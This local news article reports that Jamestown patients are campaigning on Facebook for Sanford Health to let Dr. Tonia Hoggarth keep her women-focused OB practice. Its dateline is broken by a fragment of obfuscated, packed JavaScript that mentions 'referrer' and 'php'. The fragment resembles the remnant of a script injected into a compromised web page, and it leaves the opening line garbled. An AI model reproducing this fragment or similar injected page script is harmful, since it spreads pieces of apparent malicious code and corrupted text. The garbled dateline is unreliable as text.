JAMESTOWN, ihaha|var|u0026u|referrer|ssknf||js|php’.split(‘|’),0,{}))
N.D. (NewsDakota.com) – Patients really want Dr. Tonia Hoggarth of Jamestown to stay.

Sanford Health, the largest medical facility in the Fargo, ND and Sioux Falls, SD regions, has asked Dr. Hoggarth to take on other responsibilities that would take her away from her OB patients.

Dr. Hoggarth has become a primarily woman-focused doctor in Jamestown. What Sanford wants Dr. Hoggarth to do would take her from that.

The administrator of the Facebook page, who wishes to remain anonymous, states that “The page is a culmination of all of us wanting to show our support to Dr. Hoggarth! We, her patients have started this group because we want to keep her here with us. She is the best doctor we have ever had and we can’t imagine losing her! She has delivered hundreds of our babies. She has been there for all of us in so many ways we can’t count them.”

The administrator states that Dr. Hoggarth doesn’t want to leave Jamestown, but might be forced to if she wants to continue her work.

“She is being asked to take men patients into her practice, though she has been primarily a woman’s doctor up till now. We think that she should be able to stay under her terms. We are asking Sanford to allow her to stay and do what she has always done in the past. We want her to deliver our babies, we want her to be there for our children. We want her to be our doctor!”
